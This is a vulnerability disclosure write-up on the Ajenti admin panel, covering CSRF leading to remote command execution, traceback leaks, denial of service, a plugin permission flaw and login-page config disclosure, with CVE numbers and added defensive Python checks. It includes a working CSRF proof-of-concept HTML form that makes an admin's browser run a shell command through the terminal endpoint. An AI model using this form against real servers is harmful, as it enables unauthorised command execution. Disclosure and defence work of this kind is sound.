Security Issues on Ajenti.


While researching the platform, I, Edward Amaral, and my coworker Daniel Chactoura, security researchers at Stone Payments, found several security issues in the Ajenti admin panel.

Those vulnerabilities were:

  • Multiple CSRF with Remote Code Execution
  • Improper Error Handling
  • Denial of Service
  • Security Misconfiguration

CSRF With RCE

CSRF was the first thing we looked for in the platform, because in tools like this, authentication bypass and CSRF are the vulnerabilities with the highest severity.

Well, let’s explain what we’ve done.

The CSRF occurred in several requests; we will explain the https://<IP>/api/terminal/create endpoint.

With this CSRF we can make the admin of the server execute any command we want.

We created the HTML below as the PoC. It creates a directory named Test=CSRF_PoC on the Desktop of the server.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://172.16.3.117:8000/api/terminal/create" method="POST" enctype="text/plain">
<input type="hidden" name="&#123;&quot;command&quot;&#58;&quot;mkdir&#32;&#47;home&#47;edward&#47;Desktop&#47;Test" value="CSRF_POC&quot;&#44;&quot;autoclose&quot;&#58;&quot;true&quot;}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Improper Error Handling

A traceback is returned when the request sends malformed JSON as the body of the login request. With that JSON, the server responds with file paths from the server machine.

The JSON sent was {"username":"User","password":"P4ssw0rd","mode":"normal"}=-

The trailing equal sign makes the JSON malformed and forces the server to respond with an error message that shows the path of the tool on the server.

Denial Of Service

This issue was found in the "get information" request. We found that when the name of the sensor is changed, the server responds with that name, and the string has no size control. When we saw that, the first thing that came to mind was to flood the server with a giant string, and that is what we did. The server froze, as expected.
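As an added example that is not part of the original write-up or of Ajenti's code, the Python pre-check below shows the three server-side controls that would have stopped the requests described in the CSRF, error-handling and DoS sections: requiring a JSON content type (which the text/plain form trick cannot supply), matching the Origin header, and bounding body and field sizes while returning only generic errors. The trusted origin reuses the PoC's host; the size limits and the request dictionaries are constructed assumptions.

```python
import json

TRUSTED_ORIGIN = "https://172.16.3.117:8000"  # host of the PoC form action above
MAX_BODY_BYTES = 4096   # assumed: API bodies are small JSON objects
MAX_STRING_LEN = 256    # assumed: no legitimate field (e.g. a sensor name) is longer

# Constructed requests as (headers, body). The first is what the enctype="text/plain"
# PoC form submits, the second the malformed login JSON, the third an oversized string.
CSRF_REQUEST = (
    {"Content-Type": "text/plain", "Origin": "https://attacker.example"},
    '{"command":"mkdir /home/edward/Desktop/Test=CSRF_POC","autoclose":"true"}\r\n',
)
BAD_LOGIN_REQUEST = (
    {"Content-Type": "application/json", "Origin": TRUSTED_ORIGIN},
    '{"username":"User","password":"P4ssw0rd","mode":"normal"}=-',
)
FLOOD_REQUEST = (
    {"Content-Type": "application/json", "Origin": TRUSTED_ORIGIN},
    json.dumps({"sensor": "A" * 1000}),
)

def check_json_api_request(headers, body):
    """Return (status, message, data). Messages are generic on purpose: the client
    never sees a traceback, a server path or the offending value echoed back."""
    # 1. Content type. An HTML form can only post urlencoded, multipart or text/plain
    #    bodies, so requiring application/json defeats the PoC form above.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return 415, "unsupported content type", None
    # 2. Origin. Browsers add it to cross-site POSTs; a foreign one is rejected. A
    #    missing Origin is tolerated for non-browser clients; a CSRF token would close that.
    origin = headers.get("Origin")
    if origin is not None and origin != TRUSTED_ORIGIN:
        return 403, "cross-origin request rejected", None
    # 3. Size before parsing: a giant body is refused, not buffered and echoed.
    if len(body) > MAX_BODY_BYTES:
        return 413, "request body too large", None
    # 4. Strict parse: the trailing '=-' of the login payload fails here and gets a
    #    one-line 400 instead of a stack trace containing server paths.
    try:
        data = json.loads(body)
    except ValueError:
        return 400, "malformed JSON", None
    if not isinstance(data, dict):
        return 400, "malformed JSON", None
    # 5. Per-field cap so no string field (such as the sensor name) is unbounded.
    for key, value in data.items():
        if isinstance(value, str) and len(value) > MAX_STRING_LEN:
            return 400, "field too long: " + key, None
    return 200, "", data
```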

Security Misconfiguration

On the second day we tested the permissions of the tool. As expected, the application has several features that are only usable if you have superuser privileges in the tool.

We found, however, that the request to download application plugins can be made without being an admin of the server. This raises the severity considerably, because a plugin with a known vulnerability could be downloaded to gain access to the server machine.

Request made as a regular user, and its response.

Research Update.

After further research on the platform, I, Lucas Carmo, found another issue that causes an information disclosure.

While conducting vulnerability research on the application, I started enumerating its code to understand how it works. Doing so, I identified an information disclosure in the source code of the login page, which returns valuable information such as the operating system of the server and the username of the superuser registered by the server administrator (superusers are users that are allowed to use the sudo command). Studying the application, I saw that this information comes from /etc/ajenti/config.yml and is embedded by AngularJS in the page source.

The source code:

<script>
angular.module('core').constant('urlPrefix', '');
angular.module('core').constant('ajentiPlugins', {"core": "Core", "ace": "Ace editor", "settings": "Settings", "passwd": "User DB API", "notepad": "Notepad", "plugins": "Plugins", "filemanager": "File Manager", "terminal": "Terminal", "dashboard": "Dashboard", "filesystem": "Filesystem API", "services": "Services", "packages": "Packages"});
angular.module('core').constant('initialConfigContent', {"ssl": {"client_auth": {"certificates": [], "enable": false, "force": false}, "enable": false, "certificate": null}, "max_sessions": 9, "name": "ubuntu", "language": "en", "color": "default", "bind": {"host": "0.0.0.0", "mode": "tcp", "port": 8000}, "auth": {"allow_sudo": true, "emails": {}, "provider": "os"}, "restricted_user": "root"});
angular.module('core').constant('ajentiPlatform', 'debian');
angular.module('core').constant('ajentiPlatformUnmapped', 'ubuntu');
angular.module('core').constant('ajentiVersion', '2.1.24');
angular.module('core').constant('ajentiBootstrapColor', 'default');

angular.element(document).ready(ajentiBootstrap);
</script>

Login page source showing private information.
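As an added example (not from the write-up or from Ajenti), the Python below does two things with the leaked constant: an audit check that parses a login page and lists which sensitive keys its initialConfigContent exposes, and the allow-list filter a server should apply so that only UI preferences reach the unauthenticated page. The sample page is constructed from the source above; the split into public and sensitive keys is an assumption.

```python
import json
import re

# Constructed sample: the inline <script> of the login page shown above, with the same
# keys the leaked initialConfigContent carries (the ssl block abbreviated).
LOGIN_PAGE = """<script>
angular.module('core').constant('urlPrefix', '');
angular.module('core').constant('initialConfigContent', {"ssl": {"enable": false}, "max_sessions": 9, "name": "ubuntu", "language": "en", "color": "default", "bind": {"host": "0.0.0.0", "mode": "tcp", "port": 8000}, "auth": {"allow_sudo": true, "emails": {}, "provider": "os"}, "restricted_user": "root"});
angular.module('core').constant('ajentiPlatformUnmapped', 'ubuntu');
</script>"""

# Assumed split: only UI preferences are needed before login; the rest describes the
# host (OS name, bind address, auth provider, the sudo-capable restricted user).
PUBLIC_KEYS = {"language", "color"}
SENSITIVE_KEYS = {"name", "bind", "auth", "restricted_user", "ssl", "max_sessions"}

# The constant is a JSON object literal ending in "});", so a non-greedy match up to
# the first "});" after the key captures the whole object, nested braces included.
CONFIG_RE = re.compile(r"constant\('initialConfigContent',\s*(\{.*?\})\);", re.S)

def extract_initial_config(html):
    """Pull the embedded config object out of a login page, or None if absent."""
    match = CONFIG_RE.search(html)
    return json.loads(match.group(1)) if match else None

def disclosed_sensitive_keys(html):
    """Audit check: which sensitive config keys does this login page expose?"""
    config = extract_initial_config(html)
    return sorted(k for k in config if k in SENSITIVE_KEYS) if config else []

def public_config(config):
    """Server-side fix: allow-list what reaches the unauthenticated page."""
    return {k: v for k, v in config.items() if k in PUBLIC_KEYS}
```

Running disclosed_sensitive_keys against your own instance's login page is a quick way to confirm whether the fix has been applied.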

CVEs related to these issues:

  • CVE-2018-1000080
  • CVE-2018-1000081
  • CVE-2018-1000082
  • CVE-2018-1000083
  • CVE-2018-1000126

Written by Edward Amaral Toledano, security researcher at STO Labs.
